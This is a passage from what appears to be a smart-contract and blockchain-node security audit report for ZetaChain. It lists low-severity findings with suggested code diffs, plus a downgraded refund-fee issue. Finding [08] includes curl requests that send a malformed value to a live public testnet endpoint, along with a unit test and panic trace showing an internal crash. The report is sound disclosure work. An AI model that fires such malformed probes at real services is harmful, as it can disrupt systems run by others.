			logger.Error().Msgf("Unknown chain: %d", send.InboundTxParams.SenderChainId)
+		if to == (ethcommon.Address{}) {
+			logger.Error().Msgf("Invalid receiver %s", send.InboundTxParams.Sender)
+			return
+		}
		logger.Info().Msgf("Abort: reverting inbound")
	} else if send.CctxStatus.Status == types.CctxStatus_PendingOutbound {
		to = ethcommon.HexToAddress(send.GetCurrentOutTxParam().Receiver)
		toChain = common.GetChainFromChainID(send.GetCurrentOutTxParam().ReceiverChainId)
		if toChain == nil {
			logger.Error().Msgf("Unknown chain: %d", send.GetCurrentOutTxParam().ReceiverChainId)
+		if to == (ethcommon.Address{}) {
+			logger.Error().Msgf("Invalid receiver %s", send.GetCurrentOutTxParam().Receiver)
+			return
+		}
	} else {
		logger.Info().Msgf("Transaction doesn't need to be processed status: %d", send.CctxStatus.Status)


[03] SystemContract.sol could have some minor refactor introducing a modifier

SystemContract.sol could have some minor refactor introducing a modifier as follow to aliviate and make the code cleaner, and use it on all the external functions and the contructor as they are all gated with the same condition below.

+    /**
+     * @dev Only Fungible address allowed modifier.
+     */
+     modifier onlyFungibble() {
+        if (msg.sender != FUNGIBLE_MODULE_ADDRESS) revert CallerIsNotFungibleModule();
+        _;
+    }


[04] ERC20Custody.sol has the following useless code in pause function

ERC20Custody.sol has the following useless code in pause function which I suggest to remove. Since the function is guarded by onlyTSS the modifier, which ensure msg.sender == TSSAddress before going even further into the function, this means TSSAddress can never be address(0), which make this code totally useless.

    function pause() external onlyTSS {
        if (paused) {
            revert IsPaused();
-       if (TSSAddress == address(0)) {
-           revert ZeroAddress();
-       }
        paused = true;
        emit Paused(msg.sender);


[05] ERC20Custody.sol has a divergence in the implementation regarding fees

ERC20Custody.sol has a divergence in the implementation regarding fees, consider the following:

  • zeta which represent the Zeta token contract on the chain is immutable, so can’t be changed after contract contruction.
  • zetaFee is not immutable and can be updated at any point in time by updateZetaFee.

The deposit function along with the constructor are causing this divergence, as constructor allow zeta to be address(0) at construction, which deposit account for in the following code, but then if zetaFee are modified later on (Zeta wants to start charging fees on ERC20 deposits), those fees will never be able to be charged in case zeta was passed as address(0) at constrution.

So I would recommend the following changes to mitigate this. While we are here, I would also suggest to add a validation for zetaMaxFee in the constructor since it’s immutable too.

    constructor(address TSSAddress_, address TSSAddressUpdater_, uint256 zetaFee_, uint256 zetaMaxFee_, IERC20 zeta_) {
        TSSAddress = TSSAddress_;
        TSSAddressUpdater = TSSAddressUpdater_;
        zetaFee = zetaFee_;
+       if (zeta == address(0)) revert ZeroAddress();
        zeta = zeta_;
        zetaMaxFee = zetaMaxFee_;

    function deposit(
        bytes calldata recipient,
        IERC20 asset,
        uint256 amount,
        bytes calldata message
    ) external nonReentrant {
        if (paused) {
            revert IsPaused();
        if (!whitelisted[asset]) {
            revert NotWhitelisted();
-       if (zetaFee != 0 && address(zeta) != address(0)) {
+       if (zetaFee != 0) {
            zeta.safeTransferFrom(msg.sender, TSSAddress, zetaFee);
        uint256 oldBalance = asset.balanceOf(address(this));
        asset.safeTransferFrom(msg.sender, address(this), amount);
        // In case if there is a fee on a token transfer, we might not receive a full exepected amount
        // and we need to correctly process that, o we subtract an old balance from a new balance, which should be an actual received amount.
        emit Deposited(recipient, asset, asset.balanceOf(address(this)) - oldBalance, message);


[06] evm_signer is hardcoding the gaslimit at 21000 in multiples places

evm_signer is hardcoding the gaslimit at 21000 in multiples places (see links below). We have seen in previous EVM forks changing the gas cost of some key opcode, for example the SSTORE opcode. This can happen again in the future and if it does happen that this hardcoded gas limit is not enought anymore for the target chain, it will lead to CCTX not working as expected and failures on the network. Finally, since this value need to be working for all the EVM-supported chain, the gas costs can be different to a level that this hardcoded value will not satisfy all the chains.

I would recommend to fetch this value at least from a configuration file, and have it per EVM chain, such that it is flexible enought to adapt to the future not requiring to recompile a new binary.


[07] evm_signer::SignCancelTx is unused code

evm_signer::SignCancelTx is unused code, would suggest to remove the function.


[08] gRPC endpoint ConvertGasToZeta is unsafe

gRPC endpoint ConvertGasToZeta is unsafe which allow to panic this endpoint very easely by providing a gas price that can’t be converted in Integer. Fortunatelly, there is a recovery, so the program doesn’t crash, which is why this is only submitted as a Low, otherwise that would be probably a High as you could DoS zetacored at will.

This is confirmed throught directly reaching the public endpoint as follows:

curl -X 'GET' -H 'accept: application/json' 'https://zetachain-athens.blockpi.network/lcd/v1/public/zeta-chain/crosschain/convertGasToZeta?chainId=97&gasLimit=100_000_'

{"code":13,"details":[],"message":"cannot convert \"100_000_\" to big.Int"}

While a more normal error would be as follows (for unknow chain):

curl -X 'GET' -H 'accept: application/json' 'https://zetachain-athens.blockpi.network/lcd/v1/public/zeta-chain/crosschain/convertGasToZeta?chainId=1&gasLimit=100_000'

{"code":2,"details":[],"message":"codespace observer code 1102: chain not supported"}

I also added this unit test, which also confirm the issue and the a panic is occuring internally but recovered, as the error message match the panic.

// zeta_conversion_rate_test.go
package keeper

import (


func TestConvertGasToZeta(t *testing.T) {
	keeper, ctx := setupKeeper(t)
	chainID := int64(1)
	gasLimitTest := "100_000_"
	keeper.SetGasPrice(ctx, types.GasPrice{
		ChainId:     chainID,
		MedianIndex: 0,
		Prices:      []uint64{2},

	req := &types.QueryConvertGasToZetaRequest{chainID, gasLimitTest}

	fc, err := keeper.ConvertGasToZeta(ctx, req)
	require.Nil(t, err)
	assert.Nil(t, fc)
=== RUN   TestConvertGasToZeta
--- FAIL: TestConvertGasToZeta (0.02s)
panic: cannot convert "100_000_" to big.Int [recovered]
	panic: cannot convert "100_000_" to big.Int

goroutine 78 [running]:
testing.tRunner.func1.2({0x1601920, 0xc000c61d40})
	/usr/local/go/src/testing/testing.go:1526 +0x24e
	/usr/local/go/src/testing/testing.go:1529 +0x39f
panic({0x1601920, 0xc000c61d40})
	/usr/local/go/src/runtime/panic.go:884 +0x213
github.com/zeta-chain/zetacore/x/crosschain/keeper.Keeper.ConvertGasToZeta({{0x1cb6db8, 0xc000c61d10}, {0x1c985b0, 0xc000c61c10}, {0x1c985d8, 0xc000c61c20}, {0x1c99e38, 0xc000be0bb0}, {{0x1cb2a20, 0xc000c61d00}, ...}, ...}, ...)
	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/crosschain/keeper/zeta_conversion_rate.go:27 +0x85b
	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/crosschain/keeper/zeta_conversion_rate_test.go:23 +0x2ca
testing.tRunner(0xc000ef8340, 0x1af4e20)
	/usr/local/go/src/testing/testing.go:1576 +0x10b
created by testing.(*T).Run
	/usr/local/go/src/testing/testing.go:1629 +0x3ea

Even if this error is recovered, I would recommend the team to introduce a validation ConvertGasToZeta function such that the program return proper error, and not a panicked error, which doesn’t give proper information about the error.


[09] updateTssAndConnectorAddresses from ZetaNonEth.sol is allowing TSS and Updater adresses to be updated to the same address

updateTssAndConnectorAddresses from ZetaNonEth.sol is allowing TSS and Updater adresses to be updated to the same address, which defeat the purpose of renounceTssAddressUpdater. I would recommend to add the followind condition to protect against this.

    function updateTssAndConnectorAddresses(address tssAddress_, address connectorAddress_) external {
        if (msg.sender != tssAddressUpdater && msg.sender != tssAddress) revert CallerIsNotTssOrUpdater(msg.sender);
        if (tssAddress_ == address(0) || connectorAddress_ == address(0)) revert InvalidAddress();
+       if (tssAddress_ == connectorAddress_) revert InvalidAddress();

        tssAddress = tssAddress_;
        connectorAddress = connectorAddress_;

        emit TSSAddressUpdated(msg.sender, tssAddress_);
        emit ConnectorAddressUpdated(msg.sender, connectorAddress_);


[10] EVMChainClient::observeInTX is consuming events from EVM external chains.

EVMChainClient::observeInTX is consuming events from EVM external chains. It will consume ZetaSent and Deposited logs plus check Native asset being sent directly to the TSS address. While Deposited and Native asset are communicated to Zetacore using PostSendEVMGasLimit, somehow ZetaSent isn’t, which seems wrong, so I would recommended to update this.

		// Pull out arguments from logs
		for logs.Next() {
			msg, err := ob.GetInboundVoteMsgForZetaSentEvent(logs.Event)
			if err != nil {
				ob.logger.ExternalChainWatcher.Error().Err(err).Msg("error getting inbound vote msg")

-	                zetaHash, err := ob.zetaClient.PostSend(PostSendNonEVMGasLimit, &msg)
+	                zetaHash, err := ob.zetaClient.PostSend(PostSendEVMGasLimit, &msg)
			if err != nil {
				ob.logger.ExternalChainWatcher.Error().Err(err).Msg("error posting to zeta core")
			ob.logger.ExternalChainWatcher.Info().Msgf("ZetaSent event detected and reported: PostSend zeta tx: %s", zetaHash)



[11] FetchZetaZetaNonEthTokenContract naming seems wrong

FetchZetaZetaNonEthTokenContract naming seems wrong, would recommend to rename is FetchZetaNonEthTokenContract.


[12] ERC20Custody::whitelist allow any address to be whitelisted

ERC20Custody::whitelist allow any address to be whitelisted, the only verification that is made (inside Observer before calling ERC20Custody contract) is that it’s not address(0). But this open the room for operational mistake like whitelisting ZETA token itself. Doing so would cause potential problems, as now the user would be able to pass throught ERC20Custody to send ZETA, which is not expected, and could cause multiples sides effect.

I would recommend todo the following verification in the contract (or do it in the Observer)

    function whitelist(IERC20 asset) external onlyTSS {
+       if (address(asset) == address(zeta)) revert InvalidAsset();

        whitelisted[asset] = true;
        emit Whitelisted(asset);

[13] The following protection code in fungible\keeper\evm_hooks.go is totally redundant

The following protection code in fungible\keeper\evm_hooks.go is totally redundant as if you trace back where hooks are called (with PostTxProcessing) in ethermint@v0.22.0::state_transition.go you can see that receipt parameter even if passed as a pointer can never be nil. Otherwise in case you are paranoid and like redundant code and would like to keep it somehow, then add the same protection at least in crosschain\keeper\evm_hooks.go so that is consistent accross the protocol.

func (k Keeper) CheckPausedZRC20(ctx sdk.Context, receipt *ethtypes.Receipt) error {
-	if receipt == nil {
-		return nil
-	}

	// get non-duplicated list of all addresses that emitted logs
	var addresses []ethcommon.Address


	if !res.Failed() {
		receipt.Status = ethtypes.ReceiptStatusSuccessful
		// Only call hooks if tx executed successfully.
		if err = k.PostTxProcessing(tmpCtx, msg, receipt); err != nil {
			// If hooks return error, revert the whole tx.
			res.VmError = types.ErrPostTxProcessing.Error()
			k.Logger(ctx).Error("tx post processing failed", "error", err)


[14] When PostTxProcessing I would recommend to use the same protection in fungible and crosschain when you iterage over logs

When PostTxProcessing I would recommend to use the same protection in fungible and crosschain when you iterage over logs. Right now crosschain is lacking the nil check (which might be redundant, I didn’t check). Moreover, I would highly recommend to check the Removed field as indicated by the documention and ignore those.

	// The Removed field is true if this log was reverted due to a chain reorganisation.
	// You must pay attention to this field if you receive logs through a filter query.
	Removed bool `json:"removed"`

	for _, log := range logs {
+		if log == nil || log.Removed {
+			continue
+		}

		eventWithdrawal, err := k.ParseZRC20WithdrawalEvent(ctx, *log)
		if err == nil {
			if err := k.ProcessZRC20WithdrawalEvent(ctx, eventWithdrawal, emittingContract, txOrigin); err != nil {
				return err
		eZeta, err := ParseZetaSentEvent(*log, connectorZEVMAddr)
		if err == nil {
			if err := k.ProcessZetaSentEvent(ctx, eZeta, emittingContract, txOrigin); err != nil {
				return err


[15] ProcessZetaSentEvent lacks any validation for the DestinationAddress

ProcessZetaSentEvent lacks any validation for the DestinationAddress which could translate in funds loss if sent to invalid address or address(0). I would recommend to use the same logic as in ProcessZRC20WithdrawalEvent which is better implementated, which validate the destination address is not empty and valid.

func (k Keeper) ProcessZetaSentEvent(ctx sdk.Context, event *connectorzevm.ZetaConnectorZEVMZetaSent, emittingContract ethcommon.Address, txOrigin string) error {
	if !k.zetaObserverKeeper.IsInboundEnabled(ctx) {
		return types.ErrNotEnoughPermissions


	if receiverChain.IsExternalChain() && coreParams.ZetaTokenContractAddress == "" {
		return types.ErrUnableToSendCoinType
-	toAddr := "0x" + hex.EncodeToString(event.DestinationAddress)
+	toAddr, err := receiverChain.EncodeAddress(event.DestinationAddress)
+	if err != nil {
+		return fmt.Errorf("cannot encode address %s: %s", event.DestinationAddress, err.Error())
+	}
	senderChain := common.ZetaChain()
	amount := math.NewUintFromBigInt(event.ZetaValueAndGas)



[16] PayGasInZetaAndUpdateCctx, PayGasNativeAndUpdateCctx and PayGasInERC20AndUpdateCctx should use GTE instead of GT.

I would recommend to following change to not be sending 0 amount value accross Zetachain protocol which can happen if the amount of value sent is exactly the same as fees, granted that should be rare, which is why this is a Low severity. PayGasInZetaAndUpdateCctx, PayGasNativeAndUpdateCctx and PayGasInERC20AndUpdateCctx should use GTE instead of GT.

	// subtract the withdraw fee from the input amount
-	if outTxGasFee.GT(inputAmount) {
+	if outTxGasFee.GTE(inputAmount) {
		return cosmoserrors.Wrap(types.ErrNotEnoughGas, fmt.Sprintf("outTxGasFee(%s) more than available gas for tx (%s) | Identifiers : %s ",
	ctx.Logger().Info("Subtracting amount from inbound tx", "amount", inputAmount.String(), "fee", outTxGasFee.String())
	newAmount := inputAmount.Sub(outTxGasFee)
	// reduce the amount of the outbound tx
-	if feeInZeta.GT(zetaBurnt) {
+	if feeInZeta.GTE(zetaBurnt) {
		return cosmoserrors.Wrap(types.ErrNotEnoughZetaBurnt, fmt.Sprintf("feeInZeta(%s) more than zetaBurnt (%s) | Identifiers : %s ",
	// subtract the withdraw fee from the input amount
-	if math.NewUintFromBigInt(feeInZRC20).GT(inputAmount) {
+	if math.NewUintFromBigInt(feeInZRC20).GTE(inputAmount) {
		return cosmoserrors.Wrap(types.ErrNotEnoughGas, fmt.Sprintf("feeInZRC20(%s) more than available gas for tx (%s) | Identifiers : %s ",
	newAmount := inputAmount.Sub(math.NewUintFromBigInt(feeInZRC20))


[17] Verify the receiver chain is supported in ProcessZRC20WithdrawalEvent

I would recommend to verify the receiver chain is supported in ProcessZRC20WithdrawalEvent. I understand that the condition is mostly redundant in the moment as that would require foreignCoin.ForeignChainId to be invalid somehow (which seem impossible by updating), but just to be safe, it would be more explicit and safer when refactoring the code.

func (k Keeper) ProcessZRC20WithdrawalEvent(ctx sdk.Context, event *zrc20.ZRC20Withdrawal, emittingContract ethcommon.Address, txOrigin string) error {
	if !k.zetaObserverKeeper.IsInboundEnabled(ctx) {
		return types.ErrNotEnoughPermissions
	ctx.Logger().Info("ZRC20 withdrawal to %s amount %d\n", hex.EncodeToString(event.To), event.Value)
	tss, found := k.GetTSS(ctx)
	if !found {
		return errorsmod.Wrap(types.ErrCannotFindTSSKeys, "ProcessZRC20WithdrawalEvent: cannot be processed without TSS keys")
	foreignCoin, found := k.fungibleKeeper.GetForeignCoins(ctx, event.Raw.Address.Hex())
	if !found {
		return fmt.Errorf("cannot find foreign coin with emittingContract address %s", event.Raw.Address.Hex())

	receiverChain := k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(foreignCoin.ForeignChainId)
+	if receiverChain == nil {
+		return zetaObserverTypes.ErrSupportedChains
+	}
	senderChain := common.ZetaChain()
	toAddr, err := receiverChain.EncodeAddress(event.To)


[18] DisableInboundOnly should probably be aligned with IsOutboundEnabled

There seems to be a divergence in the implementation regarding DisableInboundOnly and IsOutboundEnabled, which seems to indicate this is a bug.

DisableInboundOnly: in case crosschain flag is not found in the store, we fallback setting IsOutboundEnabled to true, which is permissive. IsOutboundEnabled: in case crosschain flag is not found in the store, we fallback returning false, which is restrictive.

The proper behavior seems to be with IsOutboundEnabled, so DisableInboundOnly should probably be aligned.

func (k Keeper) DisableInboundOnly(ctx sdk.Context) {
-	flags, found := k.GetCrosschainFlags(ctx)
+	flags, _ := k.GetCrosschainFlags(ctx)
-	if !found {
-		flags.IsOutboundEnabled = true
-	}
	flags.IsInboundEnabled = false
	k.SetCrosschainFlags(ctx, flags)

func (k Keeper) IsOutboundEnabled(ctx sdk.Context) (found bool) {
	flags, found := k.GetCrosschainFlags(ctx)
	if !found {
		return false
	return flags.IsOutboundEnabled


[19] CleanAddressList, UpdateObserverList and GetAllObserverMappersForAddress should add a break in their loop.

CleanAddressList, UpdateObserverList and GetAllObserverMappersForAddress should add a break in their loop.

func CleanAddressList(addresslist []string, address string) []string {
	index := -1
	for i, addr := range addresslist {
		if addr == address {
			index = i
+                       break
	if index != -1 {
		addresslist = RemoveIndex(addresslist, index)
	return addresslist
func UpdateObserverList(list []string, oldObserverAddresss, newObserverAddress string) {
	for i, observer := range list {
		if observer == oldObserverAddresss {
			list[i] = newObserverAddress
+                       break
func (k Keeper) GetAllObserverMappersForAddress(ctx sdk.Context, address string) (mappers []*types.ObserverMapper) {
	store := prefix.NewStore(ctx.KVStore(k.storeKey), types.KeyPrefix(types.ObserverMapperKey))
	iterator := sdk.KVStorePrefixIterator(store, []byte{})
	defer iterator.Close()
	for ; iterator.Valid(); iterator.Next() {
		var val types.ObserverMapper
		k.cdc.MustUnmarshal(iterator.Value(), &val)
		addToList := false
		for _, addr := range val.ObserverList {
			if addr == address {
				addToList = true
+                               break
		if addToList {
			mappers = append(mappers, &val)


[20] GetInboundVoteMsgForZetaSentEvent should use the variable instead of doing the computation twice.

GetInboundVoteMsgForZetaSentEvent should use the variable instead of doing the computation twice.

func (ob *EVMChainClient) GetInboundVoteMsgForZetaSentEvent(event *zetaconnector.ZetaConnectorNonEthZetaSent) (types.MsgVoteOnObservedInboundTx, error) {
	ob.logger.ExternalChainWatcher.Info().Msgf("TxBlockNumber %d Transaction Hash: %s Message : %s", event.Raw.BlockNumber, event.Raw.TxHash, event.Message)
	destChain := common.GetChainFromChainID(event.DestinationChainId.Int64())
	if destChain == nil {
		ob.logger.ExternalChainWatcher.Warn().Msgf("chain id not supported  %d", event.DestinationChainId.Int64())
		return types.MsgVoteOnObservedInboundTx{}, fmt.Errorf("chain id not supported  %d", event.DestinationChainId.Int64())
	destAddr := clienttypes.BytesToEthHex(event.DestinationAddress)
	if *destChain != common.ZetaChain() {
		cfgDest, found := ob.cfg.GetEVMConfig(destChain.ChainId)
		if !found {
			return types.MsgVoteOnObservedInboundTx{}, fmt.Errorf("chain id not present in EVMChainConfigs  %d", event.DestinationChainId.Int64())
		if strings.EqualFold(destAddr, cfgDest.ZetaTokenContractAddress) {
			ob.logger.ExternalChainWatcher.Warn().Msgf("potential attack attempt: %s destination address is ZETA token contract address %s", destChain, destAddr)
			return types.MsgVoteOnObservedInboundTx{}, fmt.Errorf("potential attack attempt: %s destination address is ZETA token contract address %s", destChain, destAddr)
	return *GetInBoundVoteMessage(
-		clienttypes.BytesToEthHex(event.DestinationAddress),
+               destAddr,
	), nil


[21] There is a missing nil check in AddBlockHeader handler

There is a missing nil check in AddBlockHeader handler which will cause the zetacored to panic, but seems to recover or at least I was not able to generate a crash, which is why I submit this only as Low.

While Observers that broadcast those AddBlockHeader message are being verified, such that an unknown chain is not possible, there is always the risk of a malicious Observer (or malicious user that have access to the node machine which could use the CLI to broadcast) to broadcast a malicious AddBlockHeader message which would include an unknown chain and trigger this panic.

I would recommend to add the missing nil check.

// AddBlockHeader handles adding a block header to the store, through majority voting of observers
func (k msgServer) AddBlockHeader(goCtx context.Context, msg *types.MsgAddBlockHeader) (*types.MsgAddBlockHeaderResponse, error) {
	ctx := sdk.UnwrapSDKContext(goCtx)

	// check authorization for this chain
	chain := common.GetChainFromChainID(msg.ChainId)
+	if chain == nil {
+		return nil, types.ErrSupportedChains
+	}	
	if ok := k.IsAuthorized(ctx, msg.Creator, chain); !ok {
		return nil, types.ErrNotAuthorizedPolicy


[22] MsgCreateTSSVoter::ValidateBasic is lacking validations

MsgCreateTSSVoter::ValidateBasic is lacking validations, for example TssPubkey and KeyGenZetaHeight are not validated at all, and neither inside the handler itself. While I understand this message is restricted to validator, I think you should add more validations as follow.

I would also recommend to go over all the ValidateBasic functions, the implementation is not consistent overall, like not all the message fields are validated inside their corresponding ValidateBasic, some lacking more then others.

func (msg *MsgCreateTSSVoter) ValidateBasic() error {
	_, err := sdk.AccAddressFromBech32(msg.Creator)
	if err != nil {
		return sdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, "invalid creator address (%s)", err)
+	_, err = cosmos.GetPubKeyFromBech32(cosmos.Bech32PubKeyTypeAccPub, msg.TssPubkey)
+	if err != nil {
+		return errorsmod.Wrapf(sdkerrors.ErrInvalidPubKey, "invalid tss pubkey (%s)", err)
+	}

	return nil


[23] Depositing wZETA from EVM chain to another external supported chain could cost much more then expected

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.


Normal cost of an ERC20 transfer on Ethereum is around 65000 gas unit. User on Ethereum (or any EVM supported chain) can send their wZETA to another EVM supported chain (thanks to CCTX), which from a user perspective should be similar in terms of cost of a normal ERC20.

Unfortunatelly, this is not the reality, in some case this could imply a huge cost or fund loss for the user which seems to warrant High severity.


High gas fees or fund loss when deposting wZETA to an external chain during the refund flow (see PoC).

Here are two undesired scenario that can occur depending on the inputs:

  • High gas, but higher wZETA value: If user send a super high gas limit like 1M gas unit (which is not abnormal) and wZETA transfered was higher in value, the refund transaction will work but that will cost a LOT of money to the user. Considering a 200 wZeta transfer that revert so refunded on Ethereum, at 30 gwei gas price, ETH at 2355 USD and wZETA at 1 USD, (1M gas unit * 60 gwei) sounds like 140 USD in fees for a failed transfer of the 200 wZETA (value of 200 USD), that’s 70% of the value being transfered paid in fees! Worst is that the transfer didn’t work, and the user is refunded only 30% of the value sent in that case (see PoC).
  • High gas, but lower wZETA value: That will cause to return error ErrNotEnoughZetaBurnt in PayGasInZetaAndUpdateCctx and will cause the transaction to be aborded, so funds loss as refund is aborted.

Proof of Concept

Let’s consider the CCTX flow described in the whitepaper as follow for Cross-Chain Message Passing.

Let say Alice want to send 200 wZETA from Ethereum to BSC using ZetaConnector.eth::send.

  • At step 1-2, this is where the user call ZetaConnector.eth::send which will emit ZetaSent log.
  • At step 3, this is where Observer consume the ZetaSent log in GetInboundVoteMsgForZetaSentEvent, do some basics validation (but use the event.DestinationGasLimit as is) and report it to zetacore, which will do some validation when receiving this broadcast in VoteOnObservedInboundTx.
  • At step 4-5, this is where the inbound is finalized and the CCTX is created, status is changed to CctxStatus_PendingOutbound as this is going to BSC and processed by Observers in TryProcessOutTx.
  • At step 9, unfortunatelly a failure happened (onReceive reverted, that can easily happen as dApp callback is involved, which is out of the control of Zeta protocol), so the refund mechanism will be triggered.

This is where there is an issue in the code. Let’s examine more in details VoteOnObservedOutboundTx when the ballot is finalized.

  1. [line 157] code branch BallotStatus_BallotFinalized_FailureObservation is selected as there was a revert.
  2. [line 161] then the else branch is taken as msg.CoinType == common.CoinType_Zeta
  3. [line 163] then case types.CctxStatus_PendingOutbound is selected
  4. [line 165] GetRevertGasLimit will return (0, nil) since cctx.InboundTxParams.CoinType == common.CoinType_Zeta.
  5. [line 171] code path gasLimit = cctx.OutboundTxParams[0].OutboundTxGasLimit will be reach, which is the problem. This will actually be the value specified originally by the user in the first call to ZetaConnector.eth::send (reminder: event.DestinationGasLimit).

The understanding of a gaslimit is that you can put very high limit to be sure your transaction doesn’t lack gas and revert in the middle, as you know the remaining gas will be refunded to you. The problem here is that this is not the case, as Zeta makes the user pay in advance for the gas the TSS will spend to send the refund transaction on the sender chain (Ethereum).

As we can see, gasLimit is assigned to the new OutboundTxParams OutboundTxGasLimit: gasLimit and then PayGasAndUpdateCctx is called.

				switch oldStatus {
				case types.CctxStatus_PendingOutbound:

					gasLimit, err := k.GetRevertGasLimit(ctx, cctx)
					if err != nil {
						return errors.New("can't get revert tx gas limit" + err.Error())
					if gasLimit == 0 {
						// use same gas limit of outbound as a fallback -- should not happen
						gasLimit = cctx.OutboundTxParams[0].OutboundTxGasLimit

					// create new OutboundTxParams for the revert
					revertTxParams := &types.OutboundTxParams{
						Receiver:           cctx.InboundTxParams.Sender,
						ReceiverChainId:    cctx.InboundTxParams.SenderChainId,
						Amount:             cctx.InboundTxParams.Amount,
						CoinType:           cctx.InboundTxParams.CoinType,
						OutboundTxGasLimit: gasLimit,
					cctx.OutboundTxParams = append(cctx.OutboundTxParams, revertTxParams)

					err = k.PayGasAndUpdateCctx(

PayGasInZetaAndUpdateCctx is then called as working with common.CoinTypeZeta, and the function will consume [ALL the gaslimit](https://github.com/code-423n4/2023-11-zetachain/blob/main/repos/node/x/crosschain/keeper/gaspayment.go#L289).

	// get the gas price
	gasPrice, isFound := k.GetMedianGasPriceInUint(ctx, chainID)
	if !isFound {
		return cosmoserrors.Wrap(types.ErrUnableToGetGasPrice, fmt.Sprintf(" chain %d | Identifiers : %s ",
	gasPrice = gasPrice.MulUint64(2) // overpays gas price by 2x

	gasLimit := sdk.NewUint(cctx.GetCurrentOutTxParam().OutboundTxGasLimit)
	outTxGasFee := gasLimit.Mul(gasPrice)

	// get the gas fee in Zeta using system uniswapv2 pool wzeta/gasZRC20 and adding the protocol fee
	outTxGasFeeInZeta, err := k.fungibleKeeper.QueryUniswapV2RouterGetZetaAmountsIn(ctx, outTxGasFee.BigInt(), gasZRC20)
	if err != nil {
		return cosmoserrors.Wrap(err, "PayGasInZetaAndUpdateCctx: unable to QueryUniswapv2RouterGetAmountsIn")
	feeInZeta := types.GetProtocolFee().Add(math.NewUintFromBigInt(outTxGasFeeInZeta))

	// reduce the amount of the outbound tx
	if feeInZeta.GT(zetaBurnt) {
		return cosmoserrors.Wrap(types.ErrNotEnoughZetaBurnt, fmt.Sprintf("feeInZeta(%s) more than zetaBurnt (%s) | Identifiers : %s ",

Cross-Chain Message Passing flow

  1. An end user interacts with a Contract C1 on Chain A.
  2. The interaction leaves an event or transaction memo, with user specified [chainID, contractAddress, message]. (The message is arbitrarily encoded application data in binary format).
  3. ZetaChain observers (in zetaclient) pick up this event/memo and report to zetacore, which verifies the inbound transaction.
  4. zetacore modifies the CCTX (cross-chain tx) state variable with OutboundTxParams which instructs the TSS signers (in zetaclient) to build, sign, and broadcast external transaction.
  5. The zetaclient TSS signers observe the OutboundTxParams in the CCTX, and build outbound tx, enter into a TSS keysign ceremony to sign the transaction, and then broadcast the signed transaction to the external blockchains. For CCMP, the outbound transaction is mainly calling the user specified contract with specified addresses and parameters.
  6. The CCTX structure also tracks the stages/status of the cross-chain transaction.
  7. Once the broadcasted transaction is included in one of the blocks (said to be “mined” or “confirmed”), zetaclients will report such confirmation to zetacore, which will update the CCTX status.
  8. If the “confirmed” outbound transaction was successful, the CCTX status becomes OutboundMined, and the CCTX is considered in its terminal state and will not be updated anymore. This CCTX processing is completed.
  9. If the “confirmed” outbound transaction is failure (e.g. revert on Ethereum chains), then the CCTX will updates it status to PendingRevert if possible, or Aborted if revert is not possible. The CCTX processing is completed if it goes to Aborted status.
  10. If the new status is “PendingRevert”, a second OutboundTxParams should be already in the CCTX, which instructs the zetaclients to create a “Revert” outbound tx to the incoming chain & contract, allowing the incoming contract to implement a application level revert function to cleanup contract state.
  11. The zetaclients will build the revert transaction, enter into TSS keysign ceremony to sign the transaction, and broadcast to the incoming blockchain (Chain A in this case).
  12. Once the revert transaction is “confirmed” on Chain A, the zetaclients will report the transaction status to zetacore.
  13. If the revert transaction is successful, the CCTX status becomes Reverted, and the CCTX processing is completed.
  14. If the revert transaction is failure, the CCTX status becomes Aborted, and the CCTX processing is completed.

GetRevertGasLimit is called in two places as follow. The comment fallback -- should not happen is actually true for InboundTx, it’s a dead code path. On the other hand, it’s an active path for OutboundTx and cause this high severity report.


I would recommend to remove the dead code path and have no fallback, the code path is anyway dead, so keeping it there make the code more vulnerable.

	gasLimit, err := k.GetRevertGasLimit(ctx, cctx)
-	if err != nil {
+	if err != nil || gasLimit == 0 {
	    cctx.CctxStatus.ChangeStatus(types.CctxStatus_Aborted, "can't get revert tx gas limit"+err.Error())
	    return &types.MsgVoteOnObservedInboundTxResponse{}, nil
-	if gasLimit == 0 {
-    	    // use same gas limit of outbound as a fallback -- should not happen
-	    gasLimit = msg.GasLimit
-	}


I understand that this will also impact the Inbound flow, but seems a noop as a failure in k.HandleEVMDeposit will always return isContractReverted false which would not reach this code path.

func (k Keeper) GetRevertGasLimit(ctx sdk.Context, cctx types.CrossChainTx) (uint64, error) {
	if cctx.InboundTxParams == nil {
		return 0, nil

-	if cctx.InboundTxParams.CoinType == common.CoinType_Gas {
+	if cctx.InboundTxParams.CoinType == common.CoinType_Gas || cctx.InboundTxParams.CoinType == common.CoinType_Zeta {
		// get the gas limit of the gas token
		fc, found := k.fungibleKeeper.GetGasCoinForForeignCoin(ctx, cctx.InboundTxParams.SenderChainId)
		if !found {
			return 0, types.ErrForeignCoinNotFound
		gasLimit, err := k.fungibleKeeper.QueryGasLimit(ctx, ethcommon.HexToAddress(fc.Zrc20ContractAddress))
		if err != nil {
			return 0, errors.Wrap(fungibletypes.ErrContractCall, err.Error())
		return gasLimit.Uint64(), nil
	} else if cctx.InboundTxParams.CoinType == common.CoinType_ERC20 {
		// get the gas limit of the associated asset
	gasLimit, err := k.GetRevertGasLimit(ctx, cctx)
	if err != nil || gasLimit == 0 {
    	   return errors.New("can't get revert tx gas limit" + err.Error())
-	if gasLimit == 0 {
-	   // use same gas limit of outbound as a fallback -- should not happen
-	   gasLimit = cctx.OutboundTxParams[0].OutboundTxGasLimit
-	}

[24] Missing key protection against the Zeta token contract when withdrawing wZETA

Note: At the judge’s request here, this downgraded issue from the same warden has been included in this report for completeness.


There are 2 ways to send ZETA token through the Zeta protocol.

  1. calling send function from the external supported EVM ZetaConnector* contracts (it’s an ERC20 on those external chain)
  2. calling send function from Zetachain ZetaConnectorZEVM by transfering wZETA.

The first (and probably the most used) use case is having a specific protection in order to prevent ZETA token to be transfered to the ERC20 ZETA token contract itself on the receiver external chain, as it doesn’t make sense for this contract to owns any ZETA.

   if strings.EqualFold(destAddr, cfgDest.ZetaTokenContractAddress) {
	ob.logger.ExternalChainWatcher.Warn().Msgf("potential attack attempt: %s destination address is ZETA token contract address %s", destChain, destAddr)
        return types.MsgVoteOnObservedInboundTx{}, fmt.Errorf("potential attack attempt: %s destination address is ZETA token contract address %s", destChain, destAddr)

